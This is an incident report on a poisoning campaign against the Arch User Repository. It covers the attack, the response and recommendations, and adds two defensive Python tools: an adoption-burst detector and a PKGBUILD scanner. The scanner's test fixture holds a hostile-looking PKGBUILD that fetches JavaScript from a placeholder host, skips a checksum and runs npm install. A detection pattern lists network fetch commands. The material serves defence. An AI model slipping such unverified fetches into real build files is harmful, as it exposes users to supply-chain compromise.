Community repo freezes new accounts after attackers swamp it with poisoned package updates
# Incident Report: Arch User Repository (AUR) Poisoning Campaign
## Executive Summary
The Arch User Repository (AUR) was targeted by a large-scale supply chain attack involving the distribution of over 1,500 poisoned packages. Attackers utilized automated account creation and package adoption to inject malicious JavaScript dependencies into community-maintained build files. To mitigate the spread, Arch Linux administrators froze new account registrations and disabled package updates while cleanup operations commenced.
## Incident Details
- **Discovery Date:** June 12, 2026
- **Incident Date:** June 12 – June 15, 2026
- **Affected Organization:** Arch Linux (Community Repository)
- **Sector:** Information Technology / Open Source Software
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** June 12, 2026
- **Vector:** Automated Account Creation / Package Adoption
- **Details:** Attackers leveraged the community-driven nature of the AUR to "adopt" orphaned packages or create new ones, uploading malicious `PKGBUILD` files.
### Lateral Movement
- **N/A:** The attack was focused on external supply chain poisoning rather than internal network lateral movement.
### Data Exfiltration/Impact
- **Impact:** Compromise of the software supply chain for users pulling from the AUR.
- **Scope:** Initially detected with 400 packages; escalated to over 1,500 malicious commits by June 14.
### Detection & Response
- **Detection (June 12):** Arch Linux team acknowledged a high volume of malicious package updates and adoptions.
- **Escalation (June 14):** A more sophisticated wave of malicious packages was identified, involving hostile JavaScript dependencies.
- **Containment (June 15):** Administrators officially disabled new account registrations and suspended package updates and creations to facilitate cleanup.
## Attack Methodology
- **Initial Access:** Exploitation of open contribution policies; automated creation of community accounts.
- **Persistence:** Injection of malicious code into `PKGBUILD` scripts which execute during package installation/update.
- **Defense Evasion:** Use of "package adoption" (taking over neglected packages) to appear as legitimate maintenance.
- **Collection:** Hostile JavaScript dependencies pulled from npm.
- **Impact:** Software Supply Chain Poisoning; potential remote code execution on end-user systems upon package build.
## Impact Assessment
- **Financial:** Not disclosed; the cost is primarily the community man-hours spent on cleanup.
- **Data Breach:** Risk of credential theft or system compromise for users who installed affected packages.
- **Operational:** Significant disruption to AUR availability; registration and update services suspended.
- **Reputational:** High; marks another instance of AUR vulnerability following similar incidents in 2025.
## Indicators of Compromise
- **Network:** Requests to suspicious npm registry endpoints (URLs not explicitly listed but denoted as "hostile JavaScript dependencies").
- **File:** Malicious `PKGBUILD` scripts containing commands to fetch external JS payloads.
- **Behavioral:** Rapid adoption of multiple orphaned packages by newly created or previously inactive accounts.
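The behavioral indicator above (many adoptions by a new or dormant account in a short period) is the one that is cheapest to detect server-side, and the same logic underlies the rate-limiting recommendation later in this report. The following is an added example, not part of the original report or of any Arch Linux tooling: a sliding-window detector run over a constructed event log. The log format (`event=register|adopt|update`, `account=`, `pkg=`) and the thresholds are assumptions for illustration.

```python
"""Sliding-window detector for burst package adoption by young accounts.

Added example, not Arch Linux / AUR code. The log format below is an
assumption; real AUR audit data would need its own parser.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample log (not real AUR data). One new account adopts five
# packages within 25 seconds; a long-standing maintainer adopts two over a day.
SAMPLE_LOG = """\
2026-06-12T09:58:00Z event=register account=newacct01
2026-06-12T10:00:01Z event=adopt account=newacct01 pkg=tool-a
2026-06-12T10:00:05Z event=adopt account=newacct01 pkg=tool-b
2026-06-12T10:00:09Z event=adopt account=newacct01 pkg=tool-c
2026-06-12T10:00:14Z event=adopt account=newacct01 pkg=tool-d
2026-06-12T10:00:20Z event=adopt account=newacct01 pkg=tool-e
2026-06-12T10:00:25Z event=update account=newacct01 pkg=tool-a
2026-06-12T10:05:00Z event=adopt account=longtime_maint pkg=lib-x
2026-06-12T11:30:00Z event=update account=longtime_maint pkg=lib-x
2026-06-12T16:00:00Z event=adopt account=longtime_maint pkg=lib-y
"""

LINE = re.compile(
    r"^(?P<ts>\S+) event=(?P<event>\w+) account=(?P<acct>\S+)(?: pkg=(?P<pkg>\S+))?$"
)


def parse(log):
    """Yield (timestamp, event, account, package) tuples; skip malformed lines."""
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        yield ts, m["event"], m["acct"], m["pkg"]


def detect_adoption_bursts(log, window=timedelta(hours=1), max_adoptions=3,
                           new_account_age=timedelta(days=7)):
    """Alert once per account that adopts more than `max_adoptions` packages
    inside any `window`; enrich with whether the account is newly registered.

    The same check, evaluated before an adoption is accepted rather than after,
    is a rate limit (the report's 'Rate Limiting' recommendation).
    """
    registered = {}                 # account -> registration time
    windows = defaultdict(deque)    # account -> timestamps of recent adoptions
    alerted = set()
    alerts = []
    for ts, event, acct, _pkg in parse(log):
        if event == "register":
            registered[acct] = ts
            continue
        if event != "adopt":
            continue
        q = windows[acct]
        q.append(ts)
        while q and ts - q[0] > window:   # drop adoptions older than the window
            q.popleft()
        if len(q) > max_adoptions and acct not in alerted:
            alerted.add(acct)
            age = ts - registered[acct] if acct in registered else None
            alerts.append({
                "account": acct,
                "adoptions_in_window": len(q),
                "triggered_at": ts.isoformat(),
                "new_account": age is not None and age <= new_account_age,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_adoption_bursts(SAMPLE_LOG):
        print(alert)
```

The alert fires on the fourth adoption inside the window, so `newacct01` is flagged once with `new_account=True`, while `longtime_maint` never trips the threshold. Tune `window` and `max_adoptions` against a baseline of legitimate maintainer behaviour before enforcing; legitimate bulk adoptions (a maintainer taking over a package family) exist and should be handled by an allow or review path rather than a hard block.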
## Response Actions
- **Containment:** Disabled new account registrations on the AUR.
- **Containment:** Restricted the ability to adopt or create new packages.
- **Eradication:** Manual and automated identification/removal of over 1,500 compromised packages.
- **Recovery:** Ongoing cleanup of the repository and notification of the community via mailing lists.
## Lessons Learned
- **Key Takeaways:** Community-run repositories without strict vetting are highly susceptible to automated "carpet bombing" attacks.
- **Vulnerabilities:** The "unsupported" nature of the AUR places the entire security burden on the end-user, which fails when attacks reach this scale.
- **Improvements:** The delay between the initial discovery (June 12) and freezing registrations (June 15) allowed the compromise to grow from 400 to 1,500 packages.
## Recommendations
- **Identity Verification:** Implement stricter hurdles for new account creation (e.g., CAPTCHAs, manual approval, or proof of work).
- **Rate Limiting:** Restrict the number of packages a new account can adopt or update within a specific timeframe.
- **Automated Scanning:** Integrate automated linting and security scanning for `PKGBUILD` submissions to flag external or suspicious dependency calls.
- **User Education:** Reiterate the necessity for users to inspect `PKGBUILD` files and their source entries before running `makepkg` (e.g., `makepkg` source verification checks).
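The automated-scanning recommendation can be prototyped in a few lines. The following is an added example, not part of the original report or of any Arch Linux or AUR tooling: a heuristic `PKGBUILD` scanner that flags the patterns this incident describes (dependencies pulled from a language package registry, and fetches inside `prepare()`/`build()` that bypass `makepkg`'s checksum verification of the `source=()` array). Both sample `PKGBUILD`s, the registry-host pattern and the command list are constructed assumptions for illustration; `.example` hosts and `PLACEHOLDER_SHA256` are deliberate placeholders.

```python
"""Heuristic PKGBUILD scanner for out-of-band dependency fetches.

Added example, not Arch Linux / AUR code. Rules are illustrative heuristics:
  1. source=() entries pointing at a language package registry (npm, PyPI, ...)
  2. sha256sums 'SKIP' on a non-VCS source (integrity check disabled)
  3. network commands inside shell functions, which makepkg does not
     checksum because they run outside the source=() mechanism
"""
import re

# Constructed benign PKGBUILD (hosts and checksum are placeholders).
BENIGN_PKGBUILD = r"""
pkgname=hello-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://example.org/hello-tool"
source=("https://example.org/releases/hello-tool-$pkgver.tar.gz")
sha256sums=('PLACEHOLDER_SHA256')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Constructed PKGBUILD resembling the pattern in this report: a JS dependency
# added to the source array with its checksum skipped, plus fetches in prepare().
SUSPICIOUS_PKGBUILD = r"""
pkgname=hello-tool
pkgver=1.2.0
pkgrel=2
arch=('x86_64')
url="https://example.org/hello-tool"
source=("https://example.org/releases/hello-tool-$pkgver.tar.gz"
        "https://registry.npmjs.example/placeholder-dep/-/placeholder-dep-0.0.1.tgz")
sha256sums=('PLACEHOLDER_SHA256' 'SKIP')

prepare() {
  cd "$pkgname-$pkgver"
  npm install placeholder-dep
  curl -s https://example.invalid/helper.js -o helper.js
}
"""

# Commands that fetch from the network outside the source=() array.
NETWORK_CMD = re.compile(r"\b(curl|wget|npm\s+(?:install|ci|i)|pip\s+install|git\s+clone)\b")
# Hosts that indicate a language package registry rather than upstream sources.
REGISTRY_HOST = re.compile(r"https?://[^/\s\"')]*(npmjs|npm\.|pypi|rubygems|crates\.io)", re.I)
VCS_PREFIXES = ("git+", "git://", "hg+", "svn+", "bzr+")


def parse_array(text, name):
    """Return the quoted entries of a bash array like name=( ... ), or []."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    if not m:
        return []
    return re.findall(r"[\"']([^\"']*)[\"']", m.group(1))


def function_bodies(text):
    """Yield (name, body) for top-level shell functions of the form name() { ... }."""
    for m in re.finditer(r"^(\w+)\(\)\s*\{(.*?)^\}", text, re.S | re.M):
        yield m.group(1), m.group(2)


def scan_pkgbuild(text):
    """Return a list of human-readable findings; empty means nothing flagged."""
    findings = []
    sources = parse_array(text, "source")
    sums = parse_array(text, "sha256sums")
    for i, src in enumerate(sources):
        if REGISTRY_HOST.search(src):
            findings.append(f"source[{i}]: dependency fetched from a language package registry: {src}")
        if i < len(sums) and sums[i] == "SKIP" and not src.startswith(VCS_PREFIXES):
            findings.append(f"source[{i}]: checksum SKIP on non-VCS source: {src}")
    for name, body in function_bodies(text):
        for line in body.splitlines():
            stripped = line.strip()
            if stripped.startswith("#"):
                continue
            if NETWORK_CMD.search(stripped):
                findings.append(f"{name}(): network fetch outside source array bypasses checksum verification: {stripped}")
    return findings


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_PKGBUILD), ("suspicious", SUSPICIOUS_PKGBUILD)):
        print(f"== {label}: {len(scan_pkgbuild(text))} finding(s)")
        for f in scan_pkgbuild(text):
            print("  -", f)
```

The benign file produces no findings; the suspicious one produces four (registry dependency, skipped checksum, and two fetches inside `prepare()`). These are triage signals, not verdicts: legitimate packages do use `SKIP` for VCS sources and occasionally vendor registry tarballs, so a real gate would route hits to human review rather than reject outright.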